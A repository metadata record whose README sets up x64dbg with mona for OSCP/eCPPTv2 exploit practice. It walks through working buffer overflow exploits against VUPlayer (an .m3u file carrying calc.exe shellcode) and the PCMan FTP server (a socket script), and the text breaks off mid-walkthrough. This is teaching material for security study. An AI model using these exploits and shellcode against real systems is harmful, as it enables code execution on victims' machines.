{"id":16714066,"url":"https://github.com/therealdreg/x64dbg-exploiting","last_synced_at":"2025-03-17T01:31:11.852Z","repository":{"id":44869017,"uuid":"322944998","full_name":"therealdreg/x64dbg-exploiting","owner":"therealdreg","description":"Do you want to use x64dbg instead of immunity debugger? oscp eCPPTv2 buffer overflow exploits pocs","archived":false,"fork":false,"pushed_at":"2024-01-20T08:02:16.000Z","size":5271,"stargazers_count":83,"open_issues_count":0,"forks_count":13,"subscribers_count":5,"default_branch":"main","last_synced_at":"2025-02-27T15:47:31.208Z","etag":null,"topics":["buffer-overflow","buffer-overflow-attack","buffer-overflow-poc","corelan","ecpptv2","ecpptv2-study","exploit-exercises","exploiting","exploiting-windows","mona","oscp","oscp-cheatsheet","oscp-notes","oscp-prep","python","x64dbg","x64dbg-plugin"],"latest_commit_sha":null,"homepage":"https://rootkit.es/","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/therealdreg.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null},"funding":{"github":["therealdreg"],"patreon":"dreg","custom":["https://www.paypal.me/therealdreg","https://www.paypal.me/therealdreg"]}},"created_at":"2020-12-19T21:56:46.000Z","updated_at":"2025-01-30T20:24:08.000Z","dependencies_parsed_at":"2024-01-20T09:22:58.962Z","dependency_job_id":"fa8b7b22-421e-46dc-9054-d46a11d6f814","html_url":"https://github.com/therealdreg/x64dbg-exploiting","commit_stats":null,"previous_names":[],"tags_count":2,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/therealdreg%2Fx64dbg-exploiting","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/therealdreg%2Fx64dbg-exploiting/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/therealdreg%2Fx64dbg-exploiting/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/therealdreg%2Fx64dbg-exploiting/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/therealdreg","download_url":"https://codeload.github.com/therealdreg/x64dbg-exploiting/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243835959,"owners_count":20355613,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["buffer-overflow","buffer-overflow-attack","buffer-overflow-poc","corelan","ecpptv2","ecpptv2-study","exploit-exercises","exploiting","exploiting-windows","mona","oscp","oscp-cheatsheet","oscp-notes","oscp-prep","python","x64dbg","x64dbg-plugin"],"created_at":"2024-10-12T20:49:05.761Z","updated_at":"2025-03-17T01:31:10.356Z","avatar_url":"https://github.com/therealdreg.png","language":null,"funding_links":["https://github.com/sponsors/therealdreg","https://patreon.com/dreg","https://www.paypal.me/therealdreg"],"categories":[],"sub_categories":[],"readme":"# x64dbg-exploiting\nDo you want to use x64dbg instead of immunity debugger? (eCPPTv2 / OSCP)\n\nPlease, consider make a donation: https://github.com/sponsors/therealdreg\n\nJust download x64dbg-exploiting (x64dbg + mona + deps + python 2 installers for windows + others plugins):\n\nhttps://github.com/therealdreg/x64dbg-exploiting/releases/download/1.1/x64dbg-exploitingv1.1.zip\n\nDoc + exploits + programs vulns:\n\nhttps://github.com/therealdreg/x64dbg-exploiting/releases/download/1.1/doc_programs_vuln_exploits.zip\n\n**WARNING:** Use ASCII PATHs for installation of all things. \n\nunzip in a ASCII PATH folder (I use: C:\\)\n\nPython installers **are included** in the x64dbg-exploiting .zip package\n\nInstall python-2.7.11.msi (I use C:\\Python27\\)\n\nInstall python-2.7.11.amd64.msi (I use C:\\Python27x64\\)\n\n![alt text](python_x64.png)\n\nSet ENV PYTHON PATH in installation:\n\n![alt text](python_path.png)\n\nDone!\n\nTry it!\n\nOpen x64dbg\\release\\x32\\x32dbg.exe \n\nOpen x64dbg\\release\\x64\\x64dbg.exe \n\nFile -\u003e Open -\u003e Debug an executable\n\nGo to Log\n\nSelect **Python** in command line\n\nWrite in command line:\n\n```\nimport mona\n```\n\nAnd now write:\n```\nmona.mona(\"modules\")\n```\n\n![alt text](command_line_python.png)\n\n![alt text](running_mona_modules_after_import.png)\n\nFor help:\n```\nmona.mona(\"help\") \n```\n\n```\nAvailable commands and parameters :\n\n? / eval             | Evaluate an expression\nassemble / asm       | Convert instructions to opcode. Separate multiple instructions with #\nbpseh / sehbp        | Set a breakpoint on all current SEH Handler function pointers\nbreakfunc / bf       | Set a breakpoint on an exported function in on or more dll's\nbreakpoint / bp      | Set a memory breakpoint on read/write or execute of a given address\nbytearray / ba       | Creates a byte array, can be used to find bad characters\ncalltrace / ct       | Log all CALL instructions\ncompare / cmp        | Compare contents of a binary file with a copy in memory\nconfig / conf        | Manage configuration file (mona.ini)\ncopy / cp            | Copy bytes from one location to another\ndeferbp / bu         | Set a deferred breakpoint\ndump                 | Dump the specified range of memory to a file\negghunter / egg      | Create egghunter code\nencode / enc         | Encode a series of bytes\nfilecompare / fc     | Compares 2 or more files created by mona using the same output commands\nfind / f             | Find bytes in memory\nfindmsp / findmsf    | Find cyclic pattern in memory\nfindwild / fw        | Find instructions in memory, accepts wildcards\nfwptr / fwp          | Find Writeable Pointers that get called\ngeteat / eat         | Show EAT of selected module(s)\ngetiat / iat         | Show IAT of selected module(s)\ngetpc                | Show getpc routines for specific registers\ngflags / gf          | Show current GFlags settings from PEB.NtGlobalFlag\nheader               | Read a binary file and convert content to a nice 'header' string\nheap                 | Show heap related information\nhelp                 | show help\nhidedebug / hd       | Attempt to hide the debugger\ninfo                 | Show information about a given address in the context of the loaded application\ninfodump / if        | Dumps specific parts of memory to file\njmp / j              | Find pointers that will allow you to jump to a register\njop                  | Finds gadgets that can be used in a JOP exploit\nkb / kb              | Manage Knowledgebase data\nmodules / mod        | Show all loaded modules and their properties\nnoaslr               | Show modules that are not aslr or rebased\nnosafeseh            | Show modules that are not safeseh protected\nnosafesehaslr        | Show modules that are not safeseh protected, not aslr and not rebased\noffset               | Calculate the number of bytes between two addresses\npageacl / pacl       | Show ACL associated with mapped pages\npattern_create / pc  | Create a cyclic pattern of a given size\npattern_offset / po  | Find location of 4 bytes in a cyclic pattern\npeb / peb            | Show location of the PEB\nrop                  | Finds gadgets that can be used in a ROP exploit and do ROP magic with them\nropfunc              | Find pointers to pointers (IAT) to interesting functions that can be used in your ROP chain\nseh                  | Find pointers to assist with SEH overwrite exploits\nsehchain / exchain   | Show the current SEH chain\nskeleton             | Create a Metasploit module skeleton with a cyclic pattern for a given type of exploit\nstackpivot           | Finds stackpivots (move stackpointer to controlled area)\nstacks               | Show all stacks for all threads in the running application\nstring / str         | Read or write a string from/to memory\nsuggest              | Suggest an exploit buffer structure\nteb / teb            | Show TEB related information\nunicodealign / ua    | Generate venetian alignment code for unicode stack buffer overflow\nupdate / up          | Update mona to the latest version\n\n\u003cb\u003eWant more info about a given command ?  Run !mona help \u003ccommand\u003e\u003c/b\u003e\n```\n\nFind jmp esp:\n```\nmona.mona(\"jmp -r esp\") \n```\n\nFind jmp esp in all modules:\n```\nmona.mona(\"jmp -r esp -m *\") \n```\n\nbytearray -cpb example:\n```\nmona.mona('bytearray -cpb \"\\\\x00\\\\x0A\"')\n```\n\ncompare example:\n```\nmona.mona('compare -f C:\\\\logs\\\\VUPlayer\\\\bytearray.bin -a ESP')\n```\n\nCheck supported commands in x64dbg:\n* https://github.com/x64dbg/mona#some-supported-commands\n* https://github.com/x64dbg/x64dbgpylib/issues/5\n\nFind multiple instructions:\n* push ecx \n* mov ebx,eax \n* xor ecx, ecx\n```\nmona.mona(\"findwild -s push ecx#mov ebx,eax#xor ecx, ecx\")\n```\n\nFind multiple instructions in a module (push esp * ret):\n```\nmona.mona(\"findwild -m nasm-2.15.05-installer-x86.exe -s push esp#*#ret\")\n```\n\n# Fixing problems\n\nIf these README-steps dont works for you:\n* try using my paths\n* try disabling Antivirus (Defender)\n* check if you are in command line Python (low right part)\n* try delete some plugin in plugins\\ \u0026 run again...\n* delete the **PYTHONPATH** from your Environment Variables. If you need use Immunity Debugger make a .bat instead:\n```\nset PYTHONPATH=C:\\Python27\\Lib\\site-packages;C:\\Python27\\Lib;C:\\Python27\\DLLs\nstart ImmunityDebugger.exe\n```\n* try it in a fresh virtual machine (without python stuff installed)\n\nMy working python ENV PATH:\n![alt text](dregenvpath.png)\n\n# Credits\n\n* https://x64dbg.com/\n* https://github.com/x64dbg/mona\n* https://github.com/x64dbg/x64dbgpy\n* https://github.com/x64dbg/x64dbgpylib\n* https://github.com/therealdreg/xshellex\n* https://github.com/Nukem9/SwissArmyKnife\n* https://github.com/klks/checksec\n* https://github.com/AandersonL/x64dbg-ASLR-Removal\n* https://github.com/0ffffffffh/yummyPaste/tree/master/yummyPaste\n* https://github.com/mrfearless/x64dbg-plugin-template-for-Visual-Studio\n\n# TODO\n\nImprove \u0026 add better support for mona-64-bits:\n* https://github.com/x64dbg/mona\n* https://github.com/x64dbg/x64dbgpy\n* https://github.com/x64dbg/x64dbgpylib\n---\n* Add more (well tested) useful plugins\n\n# Contributors\n\n* nobody loves me\n\n# Bof example\nWe are going to exploit an application vulnerable to local Bof with the help of x32dbg; the vulnerable application is this one:\nhttps://www.exploit-db.com/exploits/40018 or download it directly from this github with exploits included (VUPlayer.zip)\n\nOnce the applications are installed, both the vulnerable and the debugger we would have this:\n![1](demo_photos/1.png)\n\nMake sure to create the logs folder inside c:\n\n![42](demo_photos/42.png)\n\nOnce opened we will have to configure mona, for it, we go to log and introduce these commands:\n```\nimport mona\nmona.mona(\"help\")\nmona.mona(\"config -set workingfolder c:\\\\logs\\\\%p\")\n```\n![5](demo_photos/5.png)\n\n![6](demo_photos/6.png)\n\n![7](demo_photos/7.png)\n\n![8](demo_photos/8.png)\n\nIf the previous commands were successful, it should look like this\n\n![40](demo_photos/40.png)\n\nNow hit File-\u003eOpen and select the vulnerable program (select the .exe, not the shortcut).\n![2](demo_photos/2.png)\n![3](demo_photos/3.png)\n\nClick twice on the Run icon to open the program.\n\n![4](demo_photos/4.png)\n\nPerfect, let's start with the attack, first we must find out how many characters we have to put to overflow the stack; to do this, without leaving the log we put the following command:\n```\nmona.mona(\"pattern_create 2000\")\n```\n\n![9](demo_photos/9.png)\n\nCopy the output of the command and paste it into a .txt file, then change the extension to .m3u.\n\n![10](demo_photos/10.png)\n\n![11](demo_photos/11.png)\n\n![12](demo_photos/12.png)\n\nNow in the application that opened the debugger we click File-\u003eOpen Playlist....\n\n![13](demo_photos/13.png)\n\nPress run again twice to execute the select function correctly.\n\n![4](demo_photos/4.png)\n\nSelect the file we have generated before, in my case Bof.m3u\n\n![14](demo_photos/14.png)\n\nIn log we execute the following command and the output will tell us how many characters we have to write to overflow the stack\n```\nmona.mona(\"pattern_offset EIP\")\n```\n\n![5](demo_photos/5.png)\n\n![15](demo_photos/15.png)\n\n![16](demo_photos/16.png)\n\nAs we can see, it tells us that there are 1012 characters, taking this into account, let's start creating the exploit with the information we have\n```\n#!/usr/bin/python\nimport subprocess\nimport os\n\n\nshellcode_bind_shellfer = '\\x41' * 1012 # padding\n\n\nprint(\"\\nfile content (size \" + str(len(shellcode_bind_shellfer))  + \" bytes):\\n\")\nprint(\":\".join(\"{:02x}\".format(ord(c)) for c in shellcode_bind_shellfer))\n\nf = open('evil.m3u', 'wb')\n\nf.write(shellcode_bind_shellfer)\n\nf.close()\n```\n\n![17](demo_photos/17.png)\n\nFor now our script only has the overflow characters, now we have to find out the memory address to jump to and then run a shellcode that will open the calculator; we are going to use the debugger plugins to locate .dll that are not protected against ASLR\n\nWe are going to restart the program so that it does not remain as it is now, unusable; we go to Debug-\u003eRestart and then twice to run\n\n![20](demo_photos/20.png)\n\n![4](demo_photos/4.png)\n\nGo to Plugins-\u003echecksec-\u003echeck and when it loads we will see some unprotected .dll's.\n\n![18](demo_photos/18.png)\n\n![19](demo_photos/19.png)\n\nNow we are going to use mona to see if we can locate any jmp esp of a .dll and then put the shellcode at the top of the stack and then we will have the return address that we have to put after the script characters to execute the shellcode once we have it.\n\nWe go to log and execute:\n```\nmona.mona(\"jmp -r esp -m *\")\n```\n\n![5](demo_photos/5.png)\n\n![21](demo_photos/21.png)\n\nIt shows us some jmp esp but it shows us a file where all the calls to jmp esp have been saved, we are going to open it and look for one that interests us\n\n![22](demo_photos/22.png)\n\nLet's use the notepad feature to search for \"ASLR: False\".\n\n![23](demo_photos/23.png)\n\nAfter passing a few we see this; as we can see, it uses a vulnerable .dll and in the memory address there are no bytes like \\x00 which are usually badchars; it looks pretty good.\n\n![24](demo_photos/24.png)\n\nWe are going to update the exploit adding the address we have just taken and now there is only one thing left, locate badchars and make the shellcode\n\nWe add this to the script between the padding and the print:\n```\nshellcode_bind_shellfer += '\\x9f\\x53\\x10\\x10' # ret addr\n```\n\n![25](demo_photos/25.png)\n\nWe use mona to generate all the possible characters and then we filter the badchars; first we go to log and put this:\n```\nmona.mona(\"bytearray\")\n```\n\n![5](demo_photos/5.png)\n\n![26](demo_photos/26.png)\n\nWe copy the characters and insert them at the end of the script like this:\n```\nshellcode_bind_shellfer += \"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\\x1c\\x1d\\x1e\\x1f\"\nshellcode_bind_shellfer += \"\\x20\\x21\\x22\\x23\\x24\\x25\\x26\\x27\\x28\\x29\\x2a\\x2b\\x2c\\x2d\\x2e\\x2f\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x3a\\x3b\\x3c\\x3d\\x3e\\x3f\"\nshellcode_bind_shellfer += \"\\x40\\x41\\x42\\x43\\x44\\x45\\x46\\x47\\x48\\x49\\x4a\\x4b\\x4c\\x4d\\x4e\\x4f\\x50\\x51\\x52\\x53\\x54\\x55\\x56\\x57\\x58\\x59\\x5a\\x5b\\x5c\\x5d\\x5e\\x5f\"\nshellcode_bind_shellfer += \"\\x60\\x61\\x62\\x63\\x64\\x65\\x66\\x67\\x68\\x69\\x6a\\x6b\\x6c\\x6d\\x6e\\x6f\\x70\\x71\\x72\\x73\\x74\\x75\\x76\\x77\\x78\\x79\\x7a\\x7b\\x7c\\x7d\\x7e\\x7f\"\nshellcode_bind_shellfer += \"\\x80\\x81\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8d\\x8e\\x8f\\x90\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b\\x9c\\x9d\\x9e\\x9f\"\nshellcode_bind_shellfer += \"\\xa0\\xa1\\xa2\\xa3\\xa4\\xa5\\xa6\\xa7\\xa8\\xa9\\xaa\\xab\\xac\\xad\\xae\\xaf\\xb0\\xb1\\xb2\\xb3\\xb4\\xb5\\xb6\\xb7\\xb8\\xb9\\xba\\xbb\\xbc\\xbd\\xbe\\xbf\"\nshellcode_bind_shellfer += \"\\xc0\\xc1\\xc2\\xc3\\xc4\\xc5\\xc6\\xc7\\xc8\\xc9\\xca\\xcb\\xcc\\xcd\\xce\\xcf\\xd0\\xd1\\xd2\\xd3\\xd4\\xd5\\xd6\\xd7\\xd8\\xd9\\xda\\xdb\\xdc\\xdd\\xde\\xdf\"\nshellcode_bind_shellfer += \"\\xe0\\xe1\\xe2\\xe3\\xe4\\xe5\\xe6\\xe7\\xe8\\xe9\\xea\\xeb\\xec\\xed\\xee\\xef\\xf0\\xf1\\xf2\\xf3\\xf4\\xf5\\xf6\\xf7\\xf8\\xf9\\xfa\\xfb\\xfc\\xfd\\xfe\\xff\"\n```\n\n![27](demo_photos/27.png)\n\n![28](demo_photos/28.png)\n\nLet's check the badchars, open cmd in the Desktop and run this:\n```\npython demo_exploit.py\n```\n\n![29](demo_photos/29.png)\n\nNow we have to go to the debugger and in the vulnerable program load the evil.m3u file generated by the exploit\n\n![13](demo_photos/13.png)\n\nTwice:\n\n![4](demo_photos/4.png)\n\n![30](demo_photos/30.png)\n\nWe go to log and run this to check where it stopped copying characters and discover the first badchar, the address after the -f is given to us when we do the command mona.mona(\"bytearray\")\n```\nmona.mona('compare -f C:\\\\logs\\\\VUPlayer\\\\bytearray.bin -a ESP')\n```\n\n![5](demo_photos/5.png)\n\n![31](demo_photos/31.png)\n\nIn the output we see that from 00 on it does not copy us, we are going to generate again all the characters but removing the 00 like this:\n```\nmona.mona('bytearray -cpb \"\\\\x00\"')\n```\n\n![32](demo_photos/32.png)\n\n![33](demo_photos/33.png)\n\nNow we copy the output again, put it in the exploit removing the previous one, put it in the vulnerable program and execute it, and so on until we have all the badchars; I am going to do it only with images to make it faster; remember to restart the program every time you put an evil.m3u\n\n![34](demo_photos/34.png)\n\n![35](demo_photos/35.png)\n\n![29](demo_photos/29.png)\n\n![13](demo_photos/13.png)\n\n![30](demo_photos/30.png)\n\n![5](demo_photos/5.png)\n\n![31](demo_photos/31.png)\n\n![36](demo_photos/36.png)\n\n![37](demo_photos/37.png)\n\nAfter doing this process a couple of times, we found that the badchars are 00 09 0a and 1a\n\nWhen we have this we only need to find a shellcode that does not use these badchars, we have this one:\n\nhttps://packetstormsecurity.com/files/156478/Windows-x86-Null-Free-WinExec-Calc.exe-Shellcode.html\n\nAdding the shellcode to our script would be finished and it looks like this:\n```\n#!/usr/bin/python\nimport subprocess\nimport os\n\n# Windows\\x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes)\n# https://packetstormsecurity.com/files/156478/Windows-x86-Null-Free-WinExec-Calc.exe-Shellcode.html\nshellcode_calc = '\\x89\\xe5\\x83\\xec\\x20\\x31\\xdb\\x64\\x8b\\x5b\\x30\\x8b\\x5b\\x0c\\x8b\\x5b\\x1c\\x8b\\x1b\\x8b\\x1b\\x8b\\x43\\x08\\x89\\x45\\xfc\\x8b\\x58\\x3c\\x01\\xc3\\x8b\\x5b\\x78\\x01\\xc3\\x8b\\x7b\\x20\\x01\\xc7\\x89\\x7d\\xf8\\x8b\\x4b\\x24\\x01\\xc1\\x89\\x4d\\xf4\\x8b\\x53\\x1c\\x01\\xc2\\x89\\x55\\xf0\\x8b\\x53\\x14\\x89\\x55\\xec\\xeb\\x32\\x31\\xc0\\x8b\\x55\\xec\\x8b\\x7d\\xf8\\x8b\\x75\\x18\\x31\\xc9\\xfc\\x8b\\x3c\\x87\\x03\\x7d\\xfc\\x66\\x83\\xc1\\x08\\xf3\\xa6\\x74\\x05\\x40\\x39\\xd0\\x72\\xe4\\x8b\\x4d\\xf4\\x8b\\x55\\xf0\\x66\\x8b\\x04\\x41\\x8b\\x04\\x82\\x03\\x45\\xfc\\xc3\\xba\\x78\\x78\\x65\\x63\\xc1\\xea\\x08\\x52\\x68\\x57\\x69\\x6e\\x45\\x89\\x65\\x18\\xe8\\xb8\\xff\\xff\\xff\\x31\\xc9\\x51\\x68\\x2e\\x65\\x78\\x65\\x68\\x63\\x61\\x6c\\x63\\x89\\xe3\\x41\\x51\\x53\\xff\\xd0\\x31\\xc9\\xb9\\x01\\x65\\x73\\x73\\xc1\\xe9\\x08\\x51\\x68\\x50\\x72\\x6f\\x63\\x68\\x45\\x78\\x69\\x74\\x89\\x65\\x18\\xe8\\x87\\xff\\xff\\xff\\x31\\xd2\\x52\\xff\\xd0'\n\nshellcode_bind_shellfer = '\\x41' * 1012 # padding\nshellcode_bind_shellfer += '\\x9f\\x53\\x10\\x10' # ret addr\nshellcode_bind_shellfer += shellcode_calc\n\nprint(\"\\nfile content (size \" + str(len(shellcode_bind_shellfer))  + \" bytes):\\n\")\nprint(\":\".join(\"{:02x}\".format(ord(c)) for c in shellcode_bind_shellfer))\n\nf = open('evil.m3u', 'wb')\n\nf.write(shellcode_bind_shellfer)\n\nf.close()\n```\n\n![38](demo_photos/38.png)\n\nWhen we put in the cmd python exploit and put the evil.m3u in the vulnerable program will open the calculator and we would be all done!\n\n![29](demo_photos/29.png)\n\n![13](demo_photos/13.png)\n\n![30](demo_photos/30.png)\n\n![39](demo_photos/39.png)\n\nThe address of the vulnerable function is 004539DA\n\nDemo made by M4luk0\n\nhttps://www.linkedin.com/in/juan-antonio-gil-chamorro-8607b3197/\n\nhttps://github.com/M4luk0\n\n# Bof example OSCP like\n\nDownload the vuln app directly from this github with exploits included (pcman.zip)\n\nWe would have this:\n\n![2 1](oscp_demo_photos/2.1.png)\n\nMake sure to create the logs folder inside c:\n\n![42](demo_photos/42.png)\n\nOnce opened we will have to configure mona, for it, we go to log and introduce these commands:\n\n```\nimport mona\nmona.mona(\"help\")\nmona.mona(\"config -set workingfolder c:\\\\logs\\\\%p\")\n```\n\n![5](demo_photos/5.png)\n\n![6](demo_photos/6.png)\n\n![7](demo_photos/7.png)\n\n![8](demo_photos/8.png)\n\nIf the previous commands were successful, it should look like this\n\n![40](demo_photos/40.png)\n\nNow hit File-\u003eOpen and select the vulnerable program\n\n![2 2](oscp_demo_photos/2.2.png)\n\n![2 3](oscp_demo_photos/2.3.png)\n\nClick four times on the Run icon to open the program\n\n![4](demo_photos/4.png)\n\nPerfect, let's start with the attack, first we must find out how many characters we have to put to overflow the stack; to do this, without leaving the log we put the following command:\n\n```\nmona.mona(\"pattern_create 3000\")\n```\n\n![2 4](oscp_demo_photos/2.4.png)\n\nCopy the output of the command and paste it into a .txt file\n\n![2 5](oscp_demo_photos/2.5.png)\n\n![2 6](oscp_demo_photos/2.6.png)\n\nNow we start the script to be able to send to the FTP server the characters\n\n```\n#!/usr/bin/env python\nfrom socket import *\nfrom time import sleep\nfrom sys import exit, exc_info\nimport os\n\nos.system(\"ifconfig eth0 mtu 3000\")\n\ntarget_ip = \"IP\"\nport = int(21)\n\nshellcode = \"b8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9\"\n\nprint(\"\\nshellcode content (size \" + str(len(shellcode))  + \" bytes):\\n\")\nprint(\":\".join(\"{:02x}\".format(ord(c)) for c in shellcode))\nprint(\"\\n\")\n\ntarget = inet_aton(target_ip)\ntarget = inet_ntoa(target)\n\ntry:\n    socket = socket(AF_INET, SOCK_STREAM)\nexcept:\n    print \"\\nError creating the network socket\\n\\n%s\\n\" % exc_info()       \n    exit(1)    \n\ntry:\n    print \"Connecting to %s %d\" % (target, port)\n    socket.connect((target, port))\nexcept:\n    print \"\\nError connecting to %s\\n\\n%s\\n\" % (target, exc_info())\n    exit(1)\n    \nprint(\"Connected!\")\nsleep(1)\nprint(socket.recv(1000))\nsleep(1)\nprint(\"Logging as anonymous\")\nsocket.send('USER anonymous\\r\\n')\nsleep(1)\nprint(socket.recv(1024))\nprint(\"Empty password\")\nsleep(1)\nsocket.send('PASS\\r\\n')\nsleep(1)\nprint(socket.recv(1024))\ntry:\n    print \"Sending evil packet to %s %d (length: %d bytes), please wait a few secs....\" % (target, port, len(shellcode))\n    socket.send(shellcode)\n    sleep(4)\n    socket.close()\n\nexcept:\n    print \"\\nError sending evil packet to %s\\n\\n%s\\n\" % (target, exc_info())\n    exit(1)\n\n\nprint(\"\\n\\nDone! :-)\\n\")\n\n\nsleep(1)\n```\n\n![2 7](oscp_demo_photos/2.7.png)\n\nNow execute the exploit\n\n![2 8](oscp_demo_photos/2.8.png)\n\nOnce finished, we go to log and type the following command to find out the offset needed for the bof\n\n```\nmona.mona(\"pattern_offset EIP\")\n```\n\n![5](demo_photos/5.png)\n\n![15](demo_photos/15.png)\n\n![2 9](oscp_demo_photos/2.9.png)\n\nAs we can see, it tells us that there are 2011 characters, taking this into account, let's modify the script:\n\n```\nshellcode = '\\x41' * 2011\n```\n\n![3 0](oscp_demo_photos/3.0.png)\n\nFor now our script only has the overflow characters, now we have to find out 